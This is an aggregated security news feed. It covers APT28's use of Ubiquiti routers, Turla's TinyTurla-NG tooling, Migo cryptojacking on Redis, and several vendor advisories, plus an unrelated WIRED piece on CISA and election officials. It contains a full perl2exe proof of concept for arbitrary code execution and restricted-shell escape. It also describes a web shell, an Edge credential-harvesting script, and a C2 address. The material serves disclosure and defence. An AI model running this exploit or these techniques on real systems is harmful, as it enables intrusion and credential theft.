By Deeba Ahmed
Russian hackers, part of Russia’s Main Intelligence Directorate of the General Staff, are using compromised Ubiquiti EdgeRouters to…
This is a post from HackRead.com Read the original post: FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation

Russian hackers, part of Russia’s Main Intelligence Directorate of the General Staff, are using compromised Ubiquiti EdgeRouters to build extensive botnets, steal credentials, collect NTLMv2 digests, and proxy malicious traffic.

The FBI, NSA, US Cyber Command, and international partners have released a joint Cybersecurity Advisory to caution against Russian state-sponsored cyber actors using compromised Ubiquiti EdgeRouters for malicious cyber operations. They have also used compromised routers for spoofed landing pages and post-exploitation tools.

As per the advisory (PDF), Russia-backed APT28 actors (aka Fancy Bear) have been using compromised Ubiquiti EdgeRouters since 2022 to carry out covert cyber operations against various industries, including Aerospace & Defense, Education, and Energy & Utilities. The Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, and the US are some of its key targets. 

In 2023, APT28 actors used Python scripts to collect webmail user credentials and uploaded them to compromised Ubiquiti routers via cross-site scripting and browser-in-the-browser spear-phishing campaigns. They also exploited the CVE-2023-23397 zero-day, despite being patched, to install tools like Impacket ntlmrelayx.py and Responder on compromised routers, allowing NTLM relay attacks and host rogue authentication servers.

For your information, Microsoft’s Threat Protection Intelligence team discovered this vulnerability in Outlook that allowed attackers to steal Net-NTLMv2 hashes and access user accounts. The vulnerability was previously exploited by the group Forest Blizzard, suspected to have affiliations with the Russian military intelligence agency.  

The FBI has identified IOCs for the Mirai-baed Moobot OpenSSH trojan and APT28 activity on EdgeRouters. APT28 actors exploit vulnerabilities in OpenSSH server processes, hosting Python scripts to collect and validate stolen webmail account credentials. The actors have used iptables rules on EdgeRouters to establish reverse proxy connections and upload adversary-controlled SSH RSA keys to compromised routers. They have also used masEPIE, a Python backdoor capable of executing arbitrary commands on victim machines.

Further probing revealed that APT28 used compromised Ubiquiti EdgeRouters as C2 infrastructure for MASEPIE backdoors deployed against targets. Data sent to and from the EdgeRouters was encrypted using a randomly generated 16-character AES key.

The FBI recommends remediating compromised EdgeRouters by performing a hardware factory reset, upgrading to the latest firmware, changing default usernames and passwords, and implementing strategic firewall rules on WAN-side interfaces.

Network owners should keep their operating systems, software, and firmware up-to-date, and update Microsoft Outlook to mitigate CVE-2023-23397. To mitigate other forms of NTLM relay, network owners should consider disabling NTLM or enabling server signing and Extended Protection for Authentication configurations.

****Experts Opinions:****

For insights into the latest advisory, we reached out to John Bambenek, President at Bambenek Consulting who emphasised on the importance of patching flaws and keeping the system up-to-date.

“The single biggest advance in cybersecurity across the technical stack in 25 years was when Microsoft made auto-updating the default setting in Windows. Across the IoT, embedded devices, and network stack, this is not the norm,” John argued.

“We know devices aren’t patched by consumers or most organizations so why wouldn’t nation-state actors get in on the target-rich environment? These devices have all the weaknesses of normal computers, just without the ability of the user to harden them, put EDR on them, or do anything we would to a server to make it safer. Until manufacturers treat this problem seriously, whether it’s Mirai or a spy, these devices will continue to be compromised in bulk.”

1.  **Hackers Steal $47 Million From American Tech Firm Ubiquiti**
2.  **US Military Satellite Access Sold on Russian Forum for $15K**
3.  **Russian Hackers Employ Telekopye Toolkit in Phishing Attacks**
4.  **Russian APT29 Hacked US Biomedical Giant in TeamCity Breach**
5.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**
6.  **Russian Hackers Hit European Mail Servers for Political, Military Intel**

FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation

Executables created with perl2exe versions 30.10C and below suffer from an arbitrary code execution vulnerability.

    # Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution# Date: 10/17/2023# Exploit Author: decrazyo# Vendor Homepage: https://www.indigostar.com/# Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz# Version: <= V30.10C# Tested on: Ubuntu 22.04# Description:perl2exe packs perl scripts into native executables.Those executables use their 0th argument to locate a file to unpack and execute.Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument.That can be useful for breaking out of restricted shell environments.# Proof and Concept:user@testing:~/example$ lsp2x-30.10-Linux-x64-5.30.1.tar.gz  perl2exe-Linux-x64-5.30.1user@testing:~/example$ user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pluser@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.plPerl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software...Generating safeuser@testing:~/example$ user@testing:~/example$ # Check that the program executes as expected.user@testing:~/example$ ./safeI am completely safeuser@testing:~/example$ user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pluser@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.plPerl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software...Generating malicioususer@testing:~/example$ user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.user@testing:~/example$ chmod -x malicioususer@testing:~/example$ ./malicious-bash: ./malicious: Permission denieduser@testing:~/example$ user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.user@testing:~/example$ bash -c 'exec -a malicious ./safe'j/k I am malicious AF$ pstree -s $$systemd───sshd───sshd───sshd───bash───safe───sh───pstree$

perl2exe 30.10C Arbitrary Code Execution

diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted.

**diffoscope Path Traversal vulnerability**

Moderate severity GitHub Reviewed Published Feb 27, 2024 to the GitHub Advisory Database • Updated Feb 27, 2024

GHSA-33w6-hvmq-gh4x: diffoscope Path Traversal vulnerability

Gentoo Linux Security Advisory 202402-32 - A vulnerability has been discovered in btrbk which can lead to remote code execution. Versions greater than or equal to 0.31.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: btrbk: Remote Code Execution  
     Date: February 26, 2024  
     Bugs: #806962  
       ID: 202402-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in btrbk which can lead to remote  
code execution.

Background  
==========

btrbk is a backup tool for btrfs subvolumes, taking advantage of btrfs  
specific capabilities to create atomic snapshots and transfer them  
incrementally to your backup locations.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
app-backup/btrbk  < 0.31.2      >= 0.31.2

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

Specialy crafted commands may be executed without being propely checked.  
Applies to remote hosts filtering ssh commands using ssh_filter_btrbk.sh  
in authorized_keys.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All btrbk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-backup/btrbk-0.31.2"

References  
==========

[ 1 ] CVE-2021-38173  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-32

Republicans who run elections are split over whether to keep working with the Cybersecurity and Infrastructure Security Agency to fight hackers, online falsehoods, and polling-place threats.

The meeting between top US election officials and their cybersecurity partners from the federal government almost went off without a hitch. Then Mac Warner spoke up.

Warner, West Virginia’s Republican secretary of state, didn’t have a mundane logistical question for the government representatives, who were speaking at the winter meeting of the National Association of Secretaries of State in Washington, DC, on February 8. Instead, Warner lambasted the officials for what he said was their agencies’ scheme to suppress the truth about US president Joe Biden’s son Hunter during the 2020 election and then cover their tracks.

“When we have our own federal agencies lying to the American people, that’s the most insidious thing that we can do in elections,” Warner told the officials from the FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), who watched him impassively from the stage. “You all need to clean up your own houses.”

Neither of the officials responded to Warner, and the NASS meeting—a semiannual confab for the nation’s election administrators that deals with everything from mail-in voting to cyber threats—quickly moved on to other business. But Warner, who attended an election-denier rally after Biden’s 2020 victory and is now running for governor on a far-right platform, isn’t a fringe voice in the GOP. His impassioned speech reflected a growing right-wing backlash to the election security work of agencies like CISA and the FBI—one that now threatens the partnership that the federal government has been painstakingly building with state leaders over the eight years since Russia interfered in the 2016 election.

CISA plays a critical role in helping states run secure elections, but its work alerting social media companies to misinformation has earned it special contempt from conservatives. While most GOP secretaries of state are holding their fire about CISA’s efforts to combat online lies, Democrats and nonpartisan experts worry that that could change in the coming years. With national Republicans increasingly turning against CISA—investigating its activities and voting to slash its budget—the agency’s partnerships with GOP leaders in the states are more vulnerable than ever before.

“The hard and necessary work of securing our elections should not be a partisan issue,” says US representative Chris Deluzio, a Pennsylvania Democrat and former cyber policy scholar. “So I am very concerned that some Republican secretaries of state might undermine that work just to serve their selfish partisan interests.”

Stumbling Into Controversy

The federal program that earned Warner’s wrath began as a response to the rampant mis- and disinformation that has spread online since the 2016 election.

Determined to avoid another contest marred by viral false claims about voting processes, CISA in 2018 began coordinating conversations with social media companies and other federal agencies about the best ways to counter dangerous and destabilizing lies. During the 2020 election, through a process known as “switchboarding,” CISA alerted social media firms to complaints from state and local election officials about online misinformation, such as posts advertising incorrect voting times and locations.

It was in this spirit that FBI officials met with Twitter and Facebook executives in the lead-up to Election Day 2020 and advised them to be wary of Russian disinformation operations involving fake documents. That warning later led both companies to suppress posts about a controversial _New York Post_ story about the contents of a laptop belonging to Hunter Biden.

Silicon Valley’s response to the Hunter Biden laptop story outraged conservatives, who began accusing tech companies and their federal partners of conspiring to censor speech in an effort to rig the election. In subsequent investigations, CISA found itself squarely in the crosshairs. The agency had already earned the ire of former president Donald Trump and his allies for reassuring the public about the integrity of the 2020 election, but the new controversy practically made it a pariah on the right.

In June 2023, a House Judiciary Committee report blasted CISA as “the nerve center of the federal government’s domestic surveillance and censorship operations on social media.” A few months later, a federal appeals court partially affirmed a district judge’s ruling that placed limits on CISA’s ability to communicate with tech companies, finding that the agency’s work to fight disinformation “likely violated the First Amendment.”

Stunned by the intense backlash, CISA stopped working with social media platforms to combat mis- and disinformation. The FBI, too, scaled back its interactions with those companies, halting briefings about foreign interference activities. “The symbiotic relationship between the government and the social media companies has definitely been fractured,” a US official told NBC News.

CISA has staunchly avoided acknowledging the reality that its reputation has been damaged.

“CISA’s election security mission is stronger than ever,” says Cait Conley, a senior adviser to director Jen Easterly who oversees the agency’s election work. “We remain engaged with election officials in all 50 states and will continue to conduct all of our work in an apolitical and nonpartisan manner.”

A GOP Split

As the controversies have eroded CISA’s bipartisan brand, Republicans who run elections have split into two camps over whether to keep working with the agency to fight hackers, online falsehoods, and polling-place threats.

West Virginia’s Warner is the indisputable flag-bearer of the anti-CISA camp. “I’ve pulled away from them,” he tells WIRED at the NASS conference, a few hours after venting his frustrations to the federal officials. “I’m not attending their briefings, because I haven’t found anything useful out of them.”

Warner says he’s proud of the “tremendous advances” that federal and state officials have made together on election security since 2016, but he warns that CISA and the FBI will continue losing conservatives’ trust until they investigate their roles in the controversies of 2020. “I’ve brought this to the attention of CISA officials,” he says, “and there’s no effort there to do this.”

Warner argues that CISA’s warnings about foreign disinformation, AI-powered deep fakes, and death threats to election officials are “distractions from the real threat to American democracy” posed by censorship.

It remains unclear how many of Warner’s colleagues agree with him. But when WIRED surveyed the other 23 Republican secretaries who oversee elections in their states, several of them said they would continue working with CISA.

“The agency has been beneficial to our office by providing information and resources as it pertains to cybersecurity,” says JoDonn Chaney, a spokesperson for Missouri’s Jay Ashcroft.

South Dakota’s Monae Johnson says her office “has a good relationship with its CISA partners and plans to maintain the partnership.”

But others who praised CISA’s support also sounded notes of caution.

Idaho’s Phil McGrane says CISA is doing “critical work … to protect us from foreign cyber threats.” But he also tells WIRED that the Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC), a public-private collaboration group that he helps oversee, “is actively reviewing past efforts regarding mis/disinformation” to determine “what aligns best” with CISA’s mission.

Mississippi’s Michael Watson says that “statements following the 2020 election and some internal confidence issues we’ve since had to navigate have caused concern.” As federal and state officials gear up for this year’s elections, he adds, “my hope is CISA will act as a nonpartisan organization and stick to the facts.”

CISA’s relationships with Republican secretaries are “not as strong as they’ve been before,” says John Merrill, who served as Alabama’s secretary of state from 2015 to 2023. In part, Merrill says, that’s because of pressure from the GOP base. “Too many conservative Republican secretaries are not just concerned about how the interaction with those federal agencies is going, but also about how it’s perceived … by their constituents.”

Free Help at Risk

CISA’s defenders say the agency does critical work to help underfunded state and local officials confront cyber and physical threats to election systems.

The agency’s career civil servants and political leaders “have been outstanding” during both the Trump and Biden administrations, says Minnesota secretary of state Steve Simon, a Democrat.

Others specifically praised CISA’s coordination with tech companies to fight misinformation, arguing that officials only highlighted false claims and never ordered companies to delete posts.

“They’re just making folks aware of threats,” says Arizona’s Democratic secretary of state, Adrian Fontes. The real “bad actors,” he says, are the people who “want the election denialists and the rumor-mongers to run amok and just spread out whatever lies they want.”

If Republican officials begin disengaging from CISA, their states will lose critical security protections and resources. CISA sponsors the EI-ISAC, which shares information about threats and best practices for thwarting them; provides free services like scanning election offices’ networks for vulnerabilities, monitoring those networks for intrusions and reviewing local governments’ contingency plans; and convenes exercises to test election officials’ responses to crises.

“For GOP election officials to back away from \[CISA\] would be like a medical patient refusing to accept free wellness assessments, check-ups, and optional prescriptions from one of the world’s greatest medical centers,” says Eddie Perez, a former director for civic integrity at Twitter and a board member at the OSET Institute, a nonprofit group advocating for improved election technology.

Worse, some CISA projects will become less effective as they lose participants. The EI-ISAC’s information-sharing initiative is only as valuable as the information that state and federal agencies submit to it.

Even if most states stick with CISA, it would only take a few holdouts to create systemic risk. “America's election security posture is only as strong as its weakest jurisdiction,” says David Levine, the senior elections integrity fellow at the German Marshall Fund’s Alliance for Securing Democracy.

Cautious Optimism Despite ‘Strain’

Election security experts and Democratic officials express cautious optimism that there won’t be a GOP exodus from CISA this year.

“I have faith Republican secretaries of state will continue to prioritize their voters and collaborate with CISA to ensure a secure 2024 election,” says Mississippi representative Bennie Thompson, the top Democrat on the House Homeland Security Committee.

Lawrence Norden, the senior director of the Brennan Center for Justice’s Elections and Government Program, notes that some of CISA’s new regional election security advisers “have worked in recent years as or for Republican officeholders,” giving them credibility with GOP leaders.

According to Minnesota’s Simon, “the vast majority of secretaries find these partnerships valuable.”

Still, Warner says some secretaries quietly support his pushback against CISA and other aspects of the Biden administration’s election security strategy. “There \[is a\] meeting of the minds by some of the secretaries, especially on the right, with some of these similar concerns,” he says, even if “they’re not as outspoken as I am.”

That shared skepticism of CISA means that, even after Warner leaves office next year, the agency will remain on precarious footing with some of its Republican partners. For now, CISA’s allies are left hoping that the agency’s time-tested bonds will prove stronger than pressures from conservative activists.

“You can have strain in some areas of a relationship and still have a strong relationship,” says Arizona’s Fontes. “That’s what being a grown-up is about. And I think most of us are doing that pretty well.”

How a Right-Wing Controversy Could Sabotage US Election Security

Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.

*   Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.

*   One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.

*   Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.

**C2 server analysis**

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $\_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell\_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

*   "**task**": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/\_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.

*   "**gettask**": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.

*   "**result**": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.

*   "**getresult**": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.

*   "**file**" + "**name**": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.

*   "**cat\_file**": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.

*   "**rm\_file**": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat\_file”, “rm\_file”, “get\_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, _from a remote location_, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

**Instrumenting TinyTurla-NG to carry out post-compromise activity**

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

*   **Reconnaissance commands:** Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

*   **Copy file commands:** Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\\windows\\temp\\

PowerShell script copies files to an intermediate location.  

*   **Exfiltration** **commands/scripts aka TurlaPower-NG:** These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

*   Chisel: Modified copy of the Chisel client/agent.

*   Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.

*   Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

**Using Chisel as another means of persistent access**

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\\Windows\\System32\\TrustedWorker\[.\]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

*   **“R”:** Stands for remote port forwarding.
*   **“5000”**: This is the port on the attacker machine that receives the connection from the infected system.
*   **“socks”**: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127\[.\]0\[.\]0\[.\]1:1080)

The C2 server that the chisel sample contacts is: 91\[.\]193\[.\]18\[.\]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher\[.\]com” and the subject name is “blum\[.\]com”.

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is _blum\[.\]com_ and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd\[.\]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

The tool contains the embedded cmd\[.\]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:

C:\\windows\\system32\\edgeparser.ps1

This script is used to find  login data from Microsoft Edge located at:

%userprofile%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\\windows\\temp\\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

%userprofile%\\AppData\\Local\\Microsoft\\Edge

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\\Windows\\System32\\i.exe" \_PID\_ "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\\Windows\\System32\\cmd.exe /c "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40  
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc  
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346  
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

TinyTurla-NG in-depth tooling and command and control analysis

A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities.
"SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network," Sysdig researcher Miguel Hernández said.
"The worm automatically searches through known credential

Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks

By Deeba Ahmed
Migo Malware Campaign: User-Mode Rootkit Hides Cryptojacking on Linux Systems.
This is a post from HackRead.com Read the original post: New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security

New “Migo” malware targets Linux servers, exploiting Redis for cryptojacking. Using a user-mode rootkit, hides its activity, making detection difficult. Secure your Redis servers and stay alert!

A sophisticated Linux malware campaign has been discovered **targeting Redis**, a popular data store system, to gain initial access using “System Weakening Commands,” revealed Cado Security Labs.

Cado researchers disclosed that the malware, dubbed Migo, exploits Redis for **cryptojacking**. The attackers execute commands on their target’s Redis servers to disable configuration options and make them vulnerable before deploying the payload.

The primary payload, Migo, is a Golang ELF binary that retrieves an **XMRig installer** from GitHub. Redis system weakening commands are used to disable configuration options, such as protected mode and replica-read-only, using CLI commands to execute malicious payloads from external sources like **Pastebin** to mine cryptocurrency in the background.

For your information, Protected mode is a Redis server operating mode introduced in version 3.2.0 to mitigate potential network exposure. It only accepts connections from the loopback interface and is likely disabled at initial access to allow attackers to send additional commands.

Conversely, the replica-read-only feature in Redis prevents accidental writes to replicas that may result in out-of-sync. Cado researchers report exploitation of this feature for malicious payload delivery, with Migo attackers likely disabling it for future Redis server exploitation.

Migo uses compile-time obfuscation and a user-mode rootkit ‘libprocesshider,’ to hide processes and artefacts, making it difficult for security analysts to detect and mitigate the threat. Once the miner is installed, Migo sets XMRig’s configuration to query system information, including logged-in users and resource limits.

“It also sets the number of Huge Pages available on the system to 128, using the vm.nr\_hugepages parameter. These actions are fairly typical for cryptojacking malware,” Matt Muir, Cado Security’s security researcher noted in a **blog post**.

It executes shell commands to copy the binary, disable SELinux, identify uninstallation scripts, execute the miner, kill competing processes, register persistence, and prevent outbound traffic to specific IP addresses and domains.

Moreover, Migo relies on systemd service and timer for persistence and the developers have obfuscated symbols and strings in the pclntab structure to complicate the malware analysis process. The involvement of a user-mode rootkit also complicates post-incident forensics of compromised hosts, and libprocesshider hides on-disk artefacts.

Migo’s emergence shows that cloud-focused attackers are continually refining their techniques and focused on exploiting web-facing services. They used Redis system weakening commands to disable security features, a move not previously reported in campaigns exploiting Redis for initial access, researchers concluded.

****RELATED ARTICLES****

1.  **Hackers behind Mirai botnet & DYN DDoS attacks plead guilty**
2.  **Hackers behind Mirai botnet to avoid jail for working with the FBI**
3.  **Tiny Mantis Botnet Can Launch Powerful DDoS Attacks Than Mirai**
4.  **Reaper malware outshines Mirai; hits millions of IoT devices worldwide**
5.  **Mirai Variant ‘OMG’ Turns IoT Devices into Proxy Servers for Cryptomining**

New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security

Red Hat Security Advisory 2024-0880-03 - Red Hat OpenShift Serverless 1.31.1 is now available. Issues addressed include denial of service and traversal vulnerabilities.

